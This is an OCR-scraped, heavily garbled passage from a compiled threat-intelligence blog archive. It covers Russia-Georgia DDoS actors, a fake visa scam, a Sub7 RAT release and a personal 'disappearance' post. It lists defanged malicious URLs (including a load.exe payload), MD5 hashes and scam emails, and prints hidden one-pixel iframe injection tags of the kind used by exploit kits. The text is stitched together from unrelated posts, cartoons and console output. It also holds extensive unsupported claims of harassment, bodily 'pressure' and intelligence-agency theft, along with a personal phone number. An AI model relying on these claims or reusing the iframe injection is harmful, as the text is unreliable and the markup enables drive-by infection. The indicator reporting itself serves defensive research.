(TXT) prendedor.txt 10-Oct-2007 22:45 29k 
(TXT) xrodar.txt 1i-Jan-2008 14:07 104k 
{ }) rootnetwork.zip 27-Jan-2008 16:27 7k 
(TXT) xx3.cxe 28-Jan-2008 15:40 25k 
(TXT) safeofft.cxt 07-Jan-2008 09:00 ik 
(TXT) safeon.txt 07-Jan-2008 09:00 ik 
{TXT} scho.txt 29-Jan-2008 05:49 24k 
{ ) services2.zip 28-Jan-2008 10:15 isk 
(TXT] set.cxe 27-Jan-2008 08:32 33k 


Remember the massive [1]Russia vs Georgia cyber attack circa 2009? It seems that the time 
has come for me to dig a little bit deeper and provide [2]actionable intelligence on one of 
the actors that seem to have participated in the campaign including a sample Pro-Georgian 
type of Cyber Militia that apparently attempted to "risk-forward" the responsibility for waging 
Cyberwar to third-parties including Russian and Anti-Georgia supporters. 


How come? In this post I’ll provide actionable intelligence on what appears to be a cur- 
rently active Brazilian supporter of the Cyber Attacks that took place circa 2009 with the idea 
to discuss in-depth the tools and motivation for launching the campaign of the cybercriminals 
behind it. 


6056 


Sample malicious URL known to have participated in the campaign: 


hxxp://geocities.ws/thezart/ 


It’s 2010 and I’m coming across to a malicious and fraudulent file repository that can be 
best described as a key actor that managed to participate perhaps even orchestrate the 
Russia vs Georgia cyber attacks circa 2009. Who is this individual? How did he manage to 
contribute to the Russian vs Georgia cyber attacks? Did he rely on active outsourcing or was 
he hired to perform the orchestrated DDoS for hire attacks that took place back then? Keep 
reading. 


It appears that a Brazilian user known as The Zart managed to participated in the Rus- 
sia vs Georgia cyber attacks circa 2009 relying on a variety of tools and techniques known as: 


[TXT] shellbot.txt 18-Dec-2007 11:11 16k 
[TXT] spb.txt 27-Jan-2008 07:36 32k 
[ ] svs.zip 28-Jan-2008 08:55 15E 
[TXT] tes.txt 27-Jan-2008 07:39 33k 
[TXT] testar.txt 09-Jan-2008 16:21 244k 
[TXT] teste.txt 09-Jan-2008 16:26 164k 
[TXT] timao.txt 23-Jan-2008 08:24 33k 
(TXT] uix.txt 15-Feb-2008 11:41 14k 
(TXT] uk.txt 21-Jan-2008 06:56 31k 
[ ] unreal.zip 28-Jan-2008 08:55 8k 
[ ] unrealirced.zip 09-May-2008 14:47 LE 
[TXT] us.txt 20-Jan-2008 19:32 33k 
(TXT] ve.txt 23-Dec-2007 15:05 24k 
[ ] w-0.48.zip 12-Nov-2007 13:52 539k 
[ ] web.zip 03-Apr-2008 23:00 539k 
[ ] x.2ip 11-Jan-2008 13:45 6k 
[TXT] xgen.txt 30-Dec-2007 13:28 24k 
[TXT] xgenn.txt 14-Feb-2008 10:57 25k 
(TXT] xmlrpc.txt 09-Jan-2008 16:11 463k 
[ ] xmlrpc.zip 08-Jan-2008 18:43 7k 
[ ] xmlrpcc.zip 17-Feb-2008 15:51 7k 
[ ] xscholler.zip 07-Jan-2008 09:02 13k 
[ ] zz.Eip 06-Jan-2008 20:21 2ik 
(TXT] zart.txt 04-Nov-2007 16:30 116k 
[TXT] zartbot.txt 09-May-2008 14:52 23k 
(TXT] zartzor.txt 07-Oct-2007 09:19 24k 


- DNS Amplification Attacks 
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- Web Site Defacement Tools 
- Targeted Spreading of Vulnerable Legitimate Web Sites 


- Automated Web-Site Exploitation - Long Tail of The Malicious Web 


which basically resulted in a self-mobilized militia that actually participated and launched the 
Russia vs Georgia cyber attacks circa 2009. 


Related posts: 

[3]The Russia vs Georgia Cyber Attack 

[4]Who’s Behind the Georgia Cyber Attacks? 

[5]DDoS Attack Graphs from Russia vs Georgia’s Cyberattacks 


[6]Real-Time OSINT vs Historical OSINT in Russia/Georgia Cyberattacks 


http: //georgiaupdate. gov. ge/doc/10006922/CYBERWAR-%20fd_2_.pdf 


ttp://blog.sucuri.net/2010/02/georgia-government-sites-hacked-and.htm 


ttps ://ddanchev. blogspot .com/2008/08/the-russia-vs-georgia-cyber-attack.htm 


1. 
2. 
3. 
4. 
5. 
6. 


ttps ://ddanchev. blogspot .com/2008/10/ddos-attack-graphs-from-russia-vs.htm 


ttps ://ddanchev. blogspot .com/2008/10/real-time-osint-vs-historical-osint-in.htm 


15.2.9 Historical OSINT - Profiling a Portfolio of Fake Visa Application Scam Domains 
(2019-02-07 17:56) 


It’s been a while since | last posted a quality update profiling a versatile currently circulating 


malicious and fraudulent spam campaign profiling and highlighting the fraudulent and mali- 
cious activities of the cybercriminals behind the campaign. 


In this post I'll profile a currently circulating Fake Visa Application fraudulent campaign 
enticing users into submitting their personal details for the purpose of obtaining a fake and 
rogue viSa. 


Related emails known to have participated in the campaign: 


vizagold2010@mail.ru 
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qwerty ok@bigmir.net 
vizacom10@bigmir.net 
Abrakadabra011@yandex.ua 
alexboy40@meta.ua 
vizacom09@bigmir.net 
bestagancy@rambler.ru 
vizagold2010@mail.ru 
vizagold2010@gmail.com 
vizacom01@ua.fm 
Vizacom01@gmail.com 
Vizacom01@ukr.net 
Vizacom01@gip.ru 

visas _com@ukr.net 
Visas.com2010@gmail.com 
infinite-visas@rambler.ru 
unforeseen2010@hotmail.com 
shengen _visas@ukr.net 
shengenvisas@gmail.com 
shengenvisas@rambler.ru 


shengenvisas@bigmir.net 


Stay tuned for an updated set of malicious and fraudulent Fake Visa Application domain 
portfolio to be published anytime soon. 


15.2.10 Historical OSINT - Sub7 Crew Releases New Version on 11th Anniversary of 
The RAT (2019-02-07 18:03) 
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» SubSeven v.2.1.4 DEF CON 8 by mobman » X 
7 pluin: 127.0.0.1 ~| port: 6667 | |disconnect) |!) Qi > 


Ip scannet 


It’s 2010 and I’ve recently came across to the following announcement at Sub7’s Main Forum 
- the most ubiquitous trojan horse also known as Remote Access Tool circa the 90’s on the 
upcoming release of a new version. 


"People can buy unique FUD servers in the shop and custom clients can also be written 
to help you admin PC’s remotely with your own features. These are selling well so be sure 
to grab your own custom version while we are offering them at this price. Please be advised 
there is currently a waiting list for this." 


Sample detection rate: 

- [1]borIndmm.dll - Result: 0/42 (0 %) 

- [2]JEditServer.exe - Result: 10/42 (23.81 %) 
- [3]Server.exe - Result: 18/41 (43.91 %) 


- [4]SubSeven.exe - Result: 16/41 (39.03 %) 


Should The Scene the way we know it re-appear the way we know it? It appears that 
every then and now a new cybercrime-friendly tool is trying to materialize taking us back to 
what used to be The Scene circa the 90’s. 


1. https://www.virustotal.com/bg/file/23b0241109dea46f cd433d25a48e41f95cf 2d7ea589f7 2f4e29487 06de3e0657/analys 


3. https://www.virustotal . com/bg/file/2ba3217268b2d737a542e7b7840a4480c655b2b9414d4c57e8b1c8bfa76322c8/analys 
4. https://www.virustotal .com/bg/file/0d0d9ba70ab502cd1a61d0913ae9e9853131079e22881a2f527bf699029824ad/analys 


is/ 


15.2.11 Historical OSINT - "| Know Who DDoS-ed Georgia and Bobbear.co.uk Last 
Summer" (2019-02-07 20:30) 
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Appreciate my rhetoric. In this post I’ll provide actionable intelligence on a key DDOS for hire 
service that was primarily used in the [1]Russia vs Georgia Cyber Attacks circa 2009 including 
the [2]DDoS attack against Bobbear.co.uk. 


Related actionable intelligence on the campaign: 
hxxp://setx.in - Email: info@antiddos.eu - setx.mail@gmail.com - hxxp://httpdoc.info - 


hxxp://fakamaza.info. The last one with the email address "team@russia-vs-georgia.org" in 
the WHOIS info. 


Related malicious URLs known to have participated in the campaign: 


hxxp://cxim.inattack.ru/www7/www/auth.php 


Related malicious URLs known to have participated in the campaign: 
hxxp://h278666y.net/main/load.exe 


hxxp://h278666y.net/www/auth.php 
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Related malicious MD5s known to have participated in the campaign: 
MD5: 34413180d372a9e66d0d59baf0244b8f 
MD5: 42e4bbd47d322ec563c86c636c3f10b9 
MD5: ed36b42fac65236a868e707ee540c015 


MD5: c9falc95ab4ecl1c1d46abe5445fb41e4 


hxxp://cxim.inattack.ru/www3/www/ 


hxxp://i.clusteron.ru/bstatus.php 


Related malicious URLs known to have participated in the campaign: 


hxxp://svdrom.cn 


Related malicious URLs known to have participated in the campaign: 


hxxp://203.117.111.52/www7/www/getcfg.php 
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Related malicious domains known to have participated in the campaign: 
hxxp://cxim.inattack.ru/www2/www/stat.php 
hxxp://cxim.inattack.ru/www3/www/stat.php 
hxxp://cxim.inattack.ru/www4/www/stat.php 
hxxp://cxim.inattack.ru/www5/www/stat.php 
hxxp://cxim.inattack.ru/www6/www/stat.php 
hxxp://finito.fi.funpic.org/black/stat.php 
hxxp://logartos.org/forum/stat.php - 195.24.78.242 
hxxp://weberror.cn/be1/stat. php 

hxxp://prosto.pizdos.net/ _lol/stat.php 


hxxp://h278666y.net/www/stat.php - 72.233.60.254 


1. https: //ddanchev. blogspot .com/2019/02/historical-osint-peek-inside-georgia. html 
2. https://ddanchev. blogspot .com/2008/11/the-ddos-attack-against-bobbearcouk.htm 


15.3. March 


15.3.1 Announcing Offensive Warfare 2.0 - Official Hacking and Security Community 
Launch (2019-03-22 15:14) 


G 


® 


Offensive 
Warfare 2.0 


Dear blog readers, | wanted to let everyone know that I’ve recently launched a public [1]hack- 
ing and cyber security community repository offering Security Directory Downloads Podcasts 
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and Security Videos directory including a countless number of hacking and security resources 
including a possible hacking and security discussion including community-based services and 
products - to keep the spirit of the Scene and the Security Industry - the way we know it. 


How to obtain access? 


- consider approaching me at dancho.danchev@hush.com for the purpose of requesting 
an invite 


How you can contribute? 


- feel free to approach your colleagues and friends including social network in terms of 
spreading the word about the portal and the community 


- consider registering making an introduction and starting to contribute with content 


- approach me directly at - dancho.danchev@hush.com with your questions and possible 
feature and content suggestion 


Looking forward to receiving your response including any additional questions or com- 
ments including suggestions that you might have in terms of the project. 


Stay tuned! 


1. https://www.offensive-warfare.com/login/ 
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15.4 April 


15.4.1 Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two 
(2019-04-04 05:51) 


UPDATE: | can be reached at dancho.danchev@hush.com or at +359 87 68 93 890 in 
case of an emergency. 


UPDATE: It appears that recently a car belonging to local police department (hxxp://troyan- 
police.com; police troyan@abv.bg) was stopped somewhere around my place with the lights 
turned on with the idea to provoke a possible local police visit. 


UPDATE: It appears that my place was visited for a second time by local police officers 
(hxxp://troyan-police.com; police _troyan@abv.bg) with third-party doctors (http://mbal- 
troyan.com; mbal troyan@abv.bg) for the purpose of apparently injecting me and a 
document for the injection was signed by someone that | know. 


UPDATE: It appears that someone managed to twist my arm and therefore pressed a 
pressure on my eye without my knowledge with random people attempting to communicate 
with me behind a wall. 


UPDATE: It appears that prior to my presentation at InfoSec 2012 someone managed to 
place a plaque on the wall in Earl’s Court and therefore | experienced a pressure on my head 
while making a presentation. 


UPDATE: It appears that prior to my presentation visit in Lyon in 2010 someone man- 
aged to wound my mouth with something that can be described as wall interference. 
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UPDATE: It appears that someone managed to open my eye and therefore I’m currently 
experiencing a pressure behind a wall with random people attempting to communicate with 
me. 


UPDATE: It appears that I’m currently persistently experiencing a pressure on my mouth 
including something in the lines of a toxic chemical on my nose. 


UPDATE: It appears that someone managed to map my place including my head and 
body using rubber and is persistently trying to communicate with me. 


UPDATE: In case you're interested in contacting me in terms of my law enforcement is- 
sues and potential kidnapping and harassment attempts including possible interview requests 
- feel free to approach me at dancho.danchev@hush.com as I’m currently busy looking for 
a full time cybercrime researcher security blogger and threat intelligence analyst type of 
position. 


| would be also definitely looking forward to sharing some of my sensitive projects including 
related work in various other sensitive areas with the idea to end the ongoing IP (Intellectual 
Property) robbery courtesy of a variety of industry-leading companies and individuals. [2]Has 
the time come to work hard and set them straight? It appears so. Feel free to approach me 
at dancho.danchev@hush.com 
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Underground - Who’s Who in 
Cyber Crime for 2007? 


iframe src=./n404-1.htm width=1 height=1></iframe> 
iframe src=. {n404-2.htm width=1 height=1 ></iframe> 
iframe src=./n404-3.htm width=1 height=1></iframe> 
iframe src=. {/n404-4.htm width=1 height=1 ></iframe> 
iframe src=. j/n404-5.htm width=1 height=1 ></iframe> 


iframe src=.{n404-6.htm width=1 height=1 ></iframe> 
iframe src=./n404-7.htm width=1 height=1></iframe> 
iframe src=.{n404-8.htm width=1 height=1 ></iframe> 
iframe src=./n404-9.htm width=1 height=1></iframe> 
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Exeaeiio the Dynamic Money 
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Cyber Jihad vs Cyberterrorism — Separating Hype 
from Reality 


Dancho Danchev 


Cybercrime Researcher, Security Blogger at ZDNet, 
Security Blogger at Webroot Inc. 


as re 
~~ e et bs 
“nde sal yee 


RSACONFERENCE 
EUROPE 2012 


You can use the following PGP key to approach me regarding possible [3]career opportunities 
regarding possible involvement in related sensitive projects at dancho.danchev@hush.com or 
just to say hi request [4]Threat Data access including a sample or a possible trial or make a 
comment regarding my current and [5]historical OSINT research including possible references 
to my 2010 disappearance including various cybercrime underground chatter referencing me 
and my research including disappearance and possible kidnapping including possible GCHQ 
Lovely Horse references and related resources and comments. 


Sample Information Security and Information Warfare cartoon circa 2008: 
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All Warfare is Based on Deception 
Beijing, PRC's Cyberint Unit 


Such dare uous 
with DoD's cyber assets is 


Our NIDS 
xe 
detecting 
numerous 
traffic 
anomalies 
at some of 
our 
mailsevers. 


unacceptable. Initiate an 
immediate traceback! 


one! It’s 


Outstanding cyber 
deception! While 
they concentrate 

on the mail 
servers, we'll 
transmit back the 
data obtained 
from the infected 


from the Russian 
to faciliate OSINT 
through botnets. 
“Ensure your 
victory before 
starting a battle", 


The Chinese are 
getting smarter 
Andrei, Last 


month they 
bought access to 
-mil and .gov 
infected hosts 
only, and look at 
this Pentagon 
puppet show now 


It's called 
“segmenting 
the attack 
population" 
Yuri. 
Perhaps we 
should print 
out new 
brochures.. 


www.stripgenerator.com 


Second Sample Information Security and Information Warfare cartoon circa 2008: 


It's All a Matter of iia! psi 


Somewhere in Eastern Europe 


Can you believe 
this Yuri? 
$450,000 per 
year and nota 
single donation in 
John Doe's entire 


lifetime? 


What?! 
Someone's 
disrespecting 
Lenin's idea for 
equal distribution 
of income? 
"Proceed" with his 
bank accounts 


knowing it's teens 
without girlfriends 
behind this, I know my 


Yes honey, our, 
aaa, your 
money are safe. 


In a “hacker recruitment" basement 


It has come to our 
attention that you're 
quite talanted for a 

cybercriminal Andrei. 
Congrats, as of today 
you serve “the family" 


and will code malware 
to stay alive, 


www stripgenerator.com 


UPDATE: It appears that someone managed to somehow place a basketball ball on my 
head chin and eye and therefore I’m currently experiencing a pressure on my eye and my face 
with people attempting to communicate with me. 
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UPDATE: It appears that someone is attempting to communicate with me using pressure 
pressed on my stomach. 


UPDATE: It appears that someone is pressing a doll on a wall and is attempting to com- 
municate with me including an increased pressure in my place. 


UPDATE: It appears that different people are attempting to communicate with me be- 
hind a wall using a basketball ball interfering with the pressure in my place. 


UPDATE: It appears that the robot has been persistently sprayed with homo-sexual spray 
including a possible female spray leading to a persistent harassment and torture currently 
affecting my life-being work-relationships and intellectual property. 


UPDATE: It appears that someone managed to placed a box on the top of the robot for 
a period of several years successfully blinding me and restraining me from remote work 
activity. 
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birdwatcher [ lovelyhorse }> use users/klout_topics 
birdwatcher | lovelyt > ]> run 
r @xcharlie s: Hacking, Cybersecurity, Privacy, Information Security, Malware 
> Privacy, Microsoft Windows, Information Security, Computer Networking, Hacking 
s: Hacking, Activism, Privacy, Information Security, Wikileaks 
cs: Sony, Politico, Privacy, Computers, Wikileaks 
inland, Hacking, Helsinki, Sony, Privacy 
: Sony, Hacking, Privacy, Information Security, Cybersecurity 
Gold. BlackBerry, Kingdom of Jordan, Poker, Czech Republic 
s tc Cybersecurity, Malware, Information Security, Hacking, Privacy 
OperationLeakS Wikileaks, Occupy Wall Street, Hacking, Privacy, Central Intelligence Agency 
Theliackersitous topics: Encryption, Open Source, Privacy, Computers, Cybersecurity 
VUPEN h Cybersecurity, Sony, Hacking, Privacy, Computer Networking 
WiFuzz has 3: Hacking, Information Security, Cybersecurity, Malware, Computers 
anonops has t : Wikileaks, Hacking, Computers, Central Intelligence Agency, iPhones 
alexsotirov has cs: Hacking, Computers, Information Security, Sony, Privacy 
bradarkin has t : Sony, Cybersecurity, Hacking, Adobe, Privacy 
danchodanchev has topics: Sony, Hacking, Privacy, Computers, Malware 
daveaitel has > Cybersecurity, Hacking, Privacy, Malware, Information Security 
diocyde has top : Malware, Hacking, Information Security, Cybersecurity, Forensics 
dinodaizovi has Information Security, Cybersecurity, Hacking, Malware, Computer Networking 
Computer Networking, Open Source, Privacy, Computers, Cybersecurity 
pics: Hacking, Cybersecurity, Malware, Privacy, Information Security 
r hernano has topic Sony, Hacking, Computers, Information Security, Privacy 
hdmoore has topics: Cybersecurity, Computer Networking, Information Security, Cisco, Malware 
kevinmitnick ha >s: Hacking, Computers, Cybersecurity, Computer Networking, Software 
on, pekared ha o : Cybersecurity, Malware, Technology, Information Security, Computer Networking 
S$ iain! Cybersecurity, Information Security, Privacy, Computers 
Sony, Computer Networking, Encryption, Open Source, Nokia 
opic Oyberseourity, Hacking, Java, Privacy, Malware 
ns ftsecresponse has topics: Microsoft, Cybersecurity, Computers, Information Security, Hacking 
c : Hacking, Information Security, Malware, Cybersecurity, Sony 
Malware, Sony, Hacking, Computers, Privacy 
cs: Cybersecurity, Hacking, Malware, Computer Networking, Information Technology 
Hacking, Cybersecurity, Malware, Computers, Sony 
Cybersecurity, Hacking, Malware, Ransomware, Firefox 
Cybersecurity, Privacy, Hacking, Information Security, Computers 
Sony, rae ay sehen Information Security, Malware 
> 


+ 


+ 
+ 
+ 
+ 
+ 
> 
+ 
+ 
+ 
+ 
+ 
+ 
* 
+ 
+ 
+ 
+ 
* 
+ 
+ 
aa 
+ 
+ 
+ 
> 
+ 
> 
+ 
+ 
* 
+ 
+ 
+ 
+ 
+ 


In a related news story regarding my experience and expertise in the field it appears 
that the GCHQ has been actively monitoring me on Twitter including active traffic monitoring 
in a 2012 Intelligence Community program labeled - [6]Lovely Horse that’s basically a Palantir 
implementation of [7JOSINT practices regarding a certain Twitter account. The purpose? Ac- 
tive traffic and [8]content monitoring for the purpose of robbing me out of sensitive research 
and related research data which leads me to believe that I’ve been successfully contributing 
to a massive treasure trove IP (Intellectual Property) theft and robbery courtesy of the GCHQ 
and the NSA for a significant period of time. 
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birdwatcher [lovelyhorse ]> use users/klout_influence 


run 


n 
CERTFI is infl 
Anon_Operations influenced by: 
Anon_Operations is infl ing: LAPSEU, TeganBrand717, ThelonelyMuslc, JamleHopkinsA, AnnleBerdel 
AnonymousIRC is influen by: musalbas, Lethamyr_RL, ecce_ilva, thegrugq, Snowden 
AnonymousIRC is influencing: Joceck, der_bluthund, jbaert, TomasForgac, LeContrefacteur 
@xcharlie is influenced by: dinodaizovi, elonmusk, ryanaraine, genderteach, kSem@ 
@xcharlie is influencing: sctan, SwissHttp, lucianpacurar, M3L3NK4, grimmcyber 
JanetCSIRT is influenced by: 
JanetCSIRT is influencing: HWU_IS 
LulzSec is influenced by: 
LulzSec is influencing: r@@tedpanda, mindtyler, Nend_Sudes, DoxM3, maxjack6 
Shadowserver is influenced by: certbund, BSI_Presse, CERT_at, botherder 
Shadowserver is influenci securityfreax, dvk@iuk, BattIefists, TeMerc, certbund 
OperationLeakS is influenced by: 
OperationLeakS is influencing: quinnnt856, TheNiceBot, CopRecordings, zwa3049, whatsinanameyou 
TheHackersNews is influenced by: TheHackersNews, Swati_THN, security_wang, unix_root, sinaralabs 
TheHackersNews is influencing: meyasir588, Mroverflow, LeeCatesi, ninoslavn, gdx 
VUPEN is influenced by: Zerodium, cBekrar 
VUPEN is influc }: andromedascc, MuckRockNews, nliteNd444, amorcioccolate, sandy22i2y 
WiFuzz is in i by: XI_Research 
WiFuzz is infl -~Buitenhuis, jranil, WooMooSocial, McabeeMs, SHIELDMEsales 
alexsotirov is infl. od by: AmberBaldet, jpmorgan, trailofbits, dguido, sdowd 
alexsotirov is inf ing: dinodaizovi, AmberBaldet, Onion_ID, dawidbalut, SarahtPottrat< 
anonops is influen by: 
anonops is influencing: Amachronical, ageha7725, RaSPuTeN420, midget_levin, micchatta 
bradarkin is influenced by: derainmakerblog, w3c 
bradarkin is influencing: AdobeSecurity, tqbf, adamjodonnell, TheChrisAM, cnoanalysis 
danchodanchev is influenced by: 
danchodanchev is influencing 
daveaitel is influenced by: RealPeerReview, ErrataRob, seanhn, lawfareblog, agcrocker 
daveaitel is influencing: seanhn, Immunityinc, jepayneMSFT, bmconlon, Dave_Maynor 


+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 


- [9]}Western Spy Agencies Secretly Rely on Hackers for Intel and Expertise 


- [L0]LOVELY HORSE: GCHQ Program Monitored Hacker/InfoSec Community on Social Me- 
dia 


- [11]GCHQ’s ’Lovely Horse’ tool helped spooks monitor hackers online 


- [12]GCHQ created ’Lovely Horse’ to keep track of top hackers’ and security special- 
ists’ blogs and tweets 


- [13]Spy Agencies Rely on Hackers for Stolen Data and Monitoring Security Experts for 
Expertise 


- [14]GCHQ Create Their Own Tweetdeck To Track People of Interest 
- [15]GCHQ siphoned off info stolen by hackers for its own ends 


- [16]Some hackers are unknowingly gathering intel for the NSA 


It’s also becoming increasingly evident that I’m also a participant in several other Intelli- 
gence Community Programs that appear to have successfully attempted to rob and steal my 
"know-how" leading me to pursue a possible closed-community data and research sharing or 
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to request invite-only access to related research and data. Remember [17]HBGary? It appears 
that every then and now a security company tries to re-position the industry by offering 
targeted and proprietary Threat Intelligence to a variety of sources successfully undermining 
a variety of community-offered and presented actionable Threat Intelligence. 
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While it’s an honor to receive a competing proposition it should be noted that the major- 
ity of my research is public excluding several community-driven sensitive projects that | 
spend my time working on. It appears that the time has come for me to take my research 
to a whole new level which led me to pursue my own career patch within the Intelligence 
Community by successfully launching [18]Disruptive Individuals including the [19]Obmonix - 
Cybercrime and Cyber Jihad Fighting Platform including the eventual launch of the invite-only 
[20]Threat Data - The World’s Most Comprehensive Threat Database including a possible 
[21]career opportunity with the industry-leading Webroot including a short-term venture with 
[22]GroupSense including a possible [23]SCMagazine 2011 nomination for my Twitter activity 
including the [24]upcoming launch of Astalavista Security Group 2.0 - my primary working 
location throughout the 90’s with a currently active crowdfunding campaign. 
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While | continue to be a firm believer that sharing and communicating actionable Threat 
Intelligence to a variety of source is the appropriate way to proceed and process a variety 
of cybercrime-related campaigns and malicious activity | believe that the time has come for 
me to take my research to a whole new level prompting me to seek a new career opportunity 


as the [25]World’s leading cybercrime researcher security blogger and threat intelligence 
analyst. 


6076 


Targeted Client-Side Exploits Serving Campaigns 
Utilize the WebAttacker Web Malware Exploitation 
Kit 


Multiple Targeted MPack Client-Side Exploits 
Serving Campaigns Spotted in the Wild 
U.S Consulate St. Petersburg Serving Malware 


Fraudulent EBay Impersonating Phishing Campaign 
Spotted in the Wild 


Fraudulent PayPal Impersonating Phishing 
Campaign Spotted in the Wild 
Syrian Embassy in London Serving Malware 


Malicious Client-Side Exploits Serving Campaing 
Drops MMORPG Password Stealers 


Multiple Client-Side Exploits Serving Campaigns 
Utilize the n404 Exploit Kit 


Bank of India Web Site Compromised Leads to 
Client-Side Exploits and Malware 


Fraudulent Rock Phish Gang Phishing Campaign 
Spotted in the Wild 


Malicious Client-Side Exploits Serving Campaign 
Utilizes IcePack Web Malware Exploitation Kit for 
Fraudulent and Malicious Purposes 


World of Warcarft Phishing Campaign Spotted in the 
Wild 


Targeted Client-Side Exploits Serving Campaign 
Spotted in the Wild 
Targeted Client-Side Exploits Serving Campaign 
Spotted in the Wild 


Targeted MPack Client-Side Exploits Serving 
Campaign Spotted in the Wild 


Russian Business Network Mass iFrame Campaign 


Fake Adult Content Themed Web Sites Spreading 
Malicious Carpediem Group Dialers Spotted in the 
Wild 


The majority of sources referenced in the original research basically represent the major- 
ity of [26]my RSS feeds circa 2006 and it’s becoming increasingly interesting perhaps even 
funny to figure out that the majority of my [27JOSINT techniques including active WHOIS mon- 
itoring and research are widely accepted and discussed within the Intelligence Community. 
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What prompted the GCHQ to issue an active traffic and Twitter account monitoring cam- 
paign? Keep reading - back in the day throughout the period of 2008-2013 | used to actively 
monitor and profile various high-profile nation-state malicious and fraudulent campaigns 
including the [28]infamous Koobface botnet - listed to the [29]Joriginal MP3 interview - which 
| extensively [30]profiled and managed to practically take down including the [31]Jactive 
exposing of its core [32]botnet master including the active exposure of client-side exploits 
being served through the [33]Koobface botnet through what appears to be [34]Ja partnership 
between the Koobface botnet master and a well known cybercriminal - Exmanoize a well 
known author of a well known Web malware exploitation kit including the receiving of malware- 
infected host embedded messages in response to my "[35]10 things you didn’t know about 
the Koobface gang" including [36]what appears to be a [37]direct redirection of Facebook to 
my personal blog including yet [38Janother message left by the [39]Koobface gang, including 
a variety of [40]typosquatted C &C server domains registered to my name [41]including 
extensive [42]Russian Business Network coverage at the time. 


Sample Koobface Botnet Infographic courtesy of CyberCamp 2016: 
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EXPOSING KOOBFACE: THE 
WORLD's LARGEST BOTNET 
DANCHO DANCHEY 


It’s also worth mentioning that at the time the [43]U.S Treasury Department was also 
redirecting to my Blogger profile [44]including the active HOST file modification courtesy of 
a well known money-mule recruitment campaign. 


Consider going through the following set of resources and news articles throughout 2008-2013 
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which can best describe the Threat Intelligence Scene the way | know it and the way I’m 
positive it should be. 


Research and News Articles covering my research and referencing me throughout - 2008: 


¢ [45]Russian hacker ’militia’ mobilizes to attack Georgia 

¢ [46]Fraudsters Target Facebook With Phishing Scam 

¢ [47]Fake Microsoft e-mail contains Trojan virus 

¢ [48]Hackers expand massive IFRAME attack to prime sites 
¢ [49]Hackers infiltrate Google searches 

¢ [50]Hackers expand massive IFrame attack to prime sites 

¢ [51]Hackers knocked Comcast.net offline 

¢ [52]Adobe investigates Flash Player attacks 

¢ [53]High-tech bank robbers phone it in 

¢ [54]Attackers booby-trap searches at top Web sites 

¢ [55]Carpet bombing networks in cyberspace 

¢ [56]Storm worm e-mail says U.S. attacked Iran 

¢ [57]India’s underground CAPTCHA-breaking economy 

¢ [58]Domain Name Record Altered to Hack Comcast.net 

¢ [59]Google searchers could end up with a new type of bug 
¢ [60]Ongoing IFrame attack proving difficult to kill 

¢ [61]Hackers expand massive IFRAME attack to prime sites 
¢ [62]Danchev: The small pack Web malware exploitation kit 
¢ [63]Danchev: Massive SQL injection the Chinese way 

¢ [64]CAPTCHAs are dead - new research from Dancho Danchev confirms it 
¢ [65]Hackers infiltrate Google searches 

¢ [66]Massive faux-CNN spam blitz uses legit sites to deliver fake Flash 
¢ [67]Faked CNN spam blitz pushes fake Flash 

¢ [68]Danchev: Anti-fraud site DDOS attack 


¢ [69]Sony PlayStation site victim of SQL-injection attack 
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¢ [70]Fake CNN Alert Still Spreading Malware 
¢ [71]Look Ma, I’m on CIA.gov 


Research and News Articles covering my research and referencing me throughout - 2009: 


¢ [72]Green Dam exploit in the wild 

¢ [73]“In gaz we trust”: a fake Russian energy company facilitating cybercrime 
¢ [74]Don’t pay your ransom via SMS 

¢ [75]NYT scareware scam linked to click fraud botnet 

¢ [76]Danchev: A crimeware developer’s to-do list 

¢ [77]Danchev rained on my scareware campaign 

¢ [78]ls “aggregate-and-forget” the future of cyber-extortion? 
¢ [79]NYT scareware scam linked to click fraud botnet 

¢ [80]Microsoft declares war on ’scareware’ 

¢ [81]Don’t pay your ransom via SMS 

¢ [82]Twitter warms up malware filter 

¢ [83]What’s really the safest Web Browser? 

¢ [84]With Unrest in Iran, Cyber-attacks Begin 


¢ [85]Zeus bot found using Amazon’s EC2 as C &C server 


Research and News Articles covering my research and referencing me throughout - 2010: 


¢ [86]Firefox add-on encrypts sessions with Facebook, Twitter 

¢ [87]Watch out for malware with those pretty Mac screensavers 
¢ [88]Months-old Skype vulnerability exploited in the wild 

¢ [89]Danchev: Money mule recruiters 


¢ [90]Cybercrime’s bulletproof hosting exposed 
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¢ [91]Malware Threatens to Sue BitTorrent Downloaders 
¢ [92]Firefox add-on encrypts sessions with Facebook, Twitter 


¢ [93]Chuck Norris Botnet Karate-chops Routers Hard 


Research and News Articles covering my research and referencing me throughout - 2011: 


¢ [94]Kaspersky disputes McAfee’s Shady Rat report 
¢ [95]Has EV-SSL Growth Been Slow? 
¢ [96]Report: Vishing Attack Targets Skype Users 


Research and News Articles covering my research and referencing me throughout - 2012: 


¢ [97]Fake UPS notices deliver malware 

¢ [98]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email 

¢ [99]New Skype malware threat reported: Poison Ivy 

¢ [100]Five Koobface botnet suspects named by New York Times 

¢ [101]Virtual jihad: How real is the threat? 

¢ [102]ls the death knell sounding for traditional antivirus? 

¢ [103]Can the Nuclear exploit kit dethrone Blackhole? 

¢ [104]Experts split over regulation for bounty-hunting bug sniffers 


¢ [105]Spammers Using Fake YouTube Notifications to Peddle Drugs 
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¢ [106]Adele Bests Adderall As Affiliate Spammers Offer Music Downloads 
¢ [107]Bulgarian sleuth unveils botnet operators 

¢ [108]Fake PayPal Emails Distributing Malware 

¢ [109]Web Gang Operating in the Open 

¢ [110]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email 

¢ [111]Buy 500 hacked Twitter accounts for less than a pint 

¢ [112]NBC.com Hacked, Infected With Citadel Trojan 


Research and News Articles covering my research and referencing me throughout - 2013: 


¢ [113]How Much Does A Botnet Cost? 

¢ [114]Automated YouTube account generator offered to cyber crooks 

¢ [115]Upgraded Modular Malware Platform Released in Black Market 

¢ [116]Deconstructing the Al-Qassam Cyber Fighters Assault on US Banks 
¢ [117]NBC hack infects visitors in 'drive by’ cyberattack 

¢ [118]Bitcoins are being traded for hack tools 

¢ [119]New DIY Google Dorks Based Hacking Tool Released 

¢ [120]Hacking The TDoS Attack 

¢ [121]Mass website hacking tool alerts to dangers of Google dorks 

¢ [122]Cybercrime service automates creation of fake scanned IDs 

¢ [123]Spammers unleash DIY phone number slurping web tool 

